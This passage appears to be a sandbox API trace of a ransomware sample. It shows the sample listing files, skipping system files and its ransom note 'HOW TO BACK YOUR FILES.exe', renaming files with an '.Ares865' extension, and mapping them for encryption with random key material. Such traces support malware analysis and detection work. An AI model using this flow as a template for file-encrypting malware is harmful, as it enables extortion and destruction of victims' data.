(lpString1="Ares865", lpString2="Ares865") returned 0 [0122.332] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e33732, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e33732, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x52226c20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="connectionmanager_dmr.xml.Ares865", cAlternateFileName="")) returned 1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2=".") returned 1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="..") returned 1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="windows") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="bootmgr") returned 1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="temp") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="pagefile.sys") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="boot") returned 1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="ids.txt") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="ntuser.dat") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="perflogs") returned -1 [0122.332] lstrcmpiW (lpString1="connectionmanager_dmr.xml.Ares865", lpString2="MSBuild") returned -1 [0122.332] lstrlenW (lpString="connectionmanager_dmr.xml.Ares865") returned 33 [0122.333] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.Ares865") returned 82 [0122.333] lstrcpyW (in: lpString1=0x2cce476, lpString2="connectionmanager_dmr.xml.Ares865" | out: lpString1="connectionmanager_dmr.xml.Ares865") returned="connectionmanager_dmr.xml.Ares865" [0122.333] lstrlenW (lpString="connectionmanager_dmr.xml.Ares865") returned 33 [0122.333] lstrlenW (lpString="Ares865") returned 7 [0122.333] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0122.333] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e0d5d3, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e0d5d3, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x550eb3bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DMR_120.jpg", cAlternateFileName="")) returned 1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="aoldtz.exe") returned 1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2=".") returned 1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="..") returned 1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="windows") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="bootmgr") returned 1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="temp") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="pagefile.sys") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="boot") returned 1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="ids.txt") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="ntuser.dat") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="perflogs") returned -1 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2="MSBuild") returned -1 [0122.333] lstrlenW (lpString="DMR_120.jpg") returned 11 [0122.333] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.Ares865") returned 92 [0122.333] lstrcpyW (in: lpString1=0x2cce476, lpString2="DMR_120.jpg" | out: lpString1="DMR_120.jpg") returned="DMR_120.jpg" [0122.333] lstrlenW (lpString="DMR_120.jpg") returned 11 [0122.333] lstrlenW (lpString="Ares865") returned 7 [0122.333] lstrcmpiW (lpString1="120.jpg", lpString2="Ares865") returned -1 [0122.333] lstrlenW (lpString=".dll") returned 4 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2=".dll") returned 1 [0122.333] lstrlenW (lpString=".lnk") returned 4 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2=".lnk") returned 1 [0122.333] lstrlenW (lpString=".ini") returned 4 [0122.333] lstrcmpiW (lpString1="DMR_120.jpg", lpString2=".ini") returned 1 [0122.333] lstrlenW (lpString=".sys") returned 4 [0122.334] lstrcmpiW (lpString1="DMR_120.jpg", lpString2=".sys") returned 1 [0122.334] lstrlenW (lpString="DMR_120.jpg") returned 11 [0122.334] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.Ares865") returned 78 [0122.334] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg.ares865"), dwFlags=0x1) returned 1 [0122.336] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.336] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2979) returned 1 [0122.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.336] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.336] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.337] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.337] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.338] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xeb0, lpName=0x0) returned 0x170 [0122.340] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xeb0) returned 0x190000 [0122.342] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.343] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.343] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.343] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.343] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.344] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.344] CloseHandle (hObject=0x170) returned 1 [0122.344] CloseHandle (hObject=0x118) returned 1 [0122.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.344] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.344] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79de7474, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79de7474, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DMR_120.png", cAlternateFileName="")) returned 1 [0122.344] lstrcmpiW (lpString1="DMR_120.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.344] lstrcmpiW (lpString1="DMR_120.png", lpString2="aoldtz.exe") returned 1 [0122.344] lstrcmpiW (lpString1="DMR_120.png", lpString2=".") returned 1 [0122.344] lstrcmpiW (lpString1="DMR_120.png", lpString2="..") returned 1 [0122.344] lstrcmpiW (lpString1="DMR_120.png", lpString2="windows") returned -1 [0122.344] lstrcmpiW (lpString1="DMR_120.png", lpString2="bootmgr") returned 1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="temp") returned -1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="pagefile.sys") returned -1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="boot") returned 1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="ids.txt") returned -1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="ntuser.dat") returned -1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="perflogs") returned -1 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2="MSBuild") returned -1 [0122.345] lstrlenW (lpString="DMR_120.png") returned 11 [0122.345] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg") returned 70 [0122.345] lstrcpyW (in: lpString1=0x2cce476, lpString2="DMR_120.png" | out: lpString1="DMR_120.png") returned="DMR_120.png" [0122.345] lstrlenW (lpString="DMR_120.png") returned 11 [0122.345] lstrlenW (lpString="Ares865") returned 7 [0122.345] lstrcmpiW (lpString1="120.png", lpString2="Ares865") returned -1 [0122.345] lstrlenW (lpString=".dll") returned 4 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2=".dll") returned 1 [0122.345] lstrlenW (lpString=".lnk") returned 4 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2=".lnk") returned 1 [0122.345] lstrlenW (lpString=".ini") returned 4 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2=".ini") returned 1 [0122.345] lstrlenW (lpString=".sys") returned 4 [0122.345] lstrcmpiW (lpString1="DMR_120.png", lpString2=".sys") returned 1 [0122.345] lstrlenW (lpString="DMR_120.png") returned 11 [0122.346] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.Ares865") returned 78 [0122.346] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png.ares865"), dwFlags=0x1) returned 1 [0122.347] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.348] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=14876) returned 1 [0122.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.348] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.348] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.349] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.349] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.349] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d20, lpName=0x0) returned 0x170 [0122.358] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d20) returned 0x190000 [0122.375] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.376] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.376] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.376] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0122.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0122.376] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.376] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.377] CloseHandle (hObject=0x170) returned 1 [0122.377] CloseHandle (hObject=0x118) returned 1 [0122.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.377] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.377] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d9b1b6, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79d9b1b6, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DMR_48.jpg", cAlternateFileName="")) returned 1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="aoldtz.exe") returned 1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2=".") returned 1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="..") returned 1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="windows") returned -1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="bootmgr") returned 1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="temp") returned -1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="pagefile.sys") returned -1 [0122.377] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="boot") returned 1 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="ids.txt") returned -1 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="ntuser.dat") returned -1 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="perflogs") returned -1 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2="MSBuild") returned -1 [0122.378] lstrlenW (lpString="DMR_48.jpg") returned 10 [0122.378] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png") returned 70 [0122.378] lstrcpyW (in: lpString1=0x2cce476, lpString2="DMR_48.jpg" | out: lpString1="DMR_48.jpg") returned="DMR_48.jpg" [0122.378] lstrlenW (lpString="DMR_48.jpg") returned 10 [0122.378] lstrlenW (lpString="Ares865") returned 7 [0122.378] lstrcmpiW (lpString1="_48.jpg", lpString2="Ares865") returned -1 [0122.378] lstrlenW (lpString=".dll") returned 4 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2=".dll") returned 1 [0122.378] lstrlenW (lpString=".lnk") returned 4 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2=".lnk") returned 1 [0122.378] lstrlenW (lpString=".ini") returned 4 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2=".ini") returned 1 [0122.378] lstrlenW (lpString=".sys") returned 4 [0122.378] lstrcmpiW (lpString1="DMR_48.jpg", lpString2=".sys") returned 1 [0122.378] lstrlenW (lpString="DMR_48.jpg") returned 10 [0122.379] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.Ares865") returned 77 [0122.379] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg.ares865"), dwFlags=0x1) returned 1 [0122.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.389] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1220) returned 1 [0122.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.389] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0122.389] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0122.390] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0122.390] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.390] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x170 [0122.391] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x190000 [0122.394] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0122.395] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0122.395] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0122.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0122.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0122.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0122.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0122.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0122.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0122.395] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0122.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0122.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0122.395] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0122.395] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0122.395] CloseHandle (hObject=0x170) returned 1 [0122.395] CloseHandle (hObject=0x118) returned 1 [0122.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0122.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0122.396] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0122.396] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5511151c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0x5511151c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x10a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DMR_48.png", cAlternateFileName="")) returned 1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="aoldtz.exe") returned 1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2=".") returned 1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="..") returned 1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="windows") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="bootmgr") returned 1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="temp") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="pagefile.sys") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="boot") returned 1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="ids.txt") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="ntuser.dat") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="perflogs") returned -1 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2="MSBuild") returned -1 [0122.396] lstrlenW (lpString="DMR_48.png") returned 10 [0122.396] lstrlenW (lpString="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg") returned 69 [0122.396] lstrcpyW (in: lpString1=0x2cce476, lpString2="DMR_48.png" | out: lpString1="DMR_48.png") returned="DMR_48.png" [0122.396] lstrlenW (lpString="DMR_48.png") returned 10 [0122.396] lstrlenW (lpString="Ares865") returned 7 [0122.396] lstrcmpiW (lpString1="_48.png", lpString2="Ares865") returned -1 [0122.396] lstrlenW (lpString=".dll") returned 4 [0122.396] lstrcmpiW (lpString1="DMR_48.png", lpString2=".dll") returned 1 [0122.396] lstrlenW (lpString=".lnk") returned 4 [0122.397] lstrcmpiW (lpString1="DMR_48.png", lpString2=".lnk") returned 1 [0122.397] lstrlenW (lpString=".ini") returned 4 [0122.397] lstrcmpiW (lpString1="DMR_48.png", lpString2=".ini") returned 1 [0122.397] lstrlenW (lpString=".sys") returned 4 [0122.397] lstrcmpiW (lpString1="DMR_48.png", lpString2=".sys") returned 1 [0122.397] lstrlenW (lpString="DMR_48.png") returned 10 [0122.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.Ares865") returned 77 [0122.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png.ares865"), dwFlags=0x1) returned 1 [0122.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.Ares865" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0122.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4265) returned 1 [0122.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0122.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0122.399] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 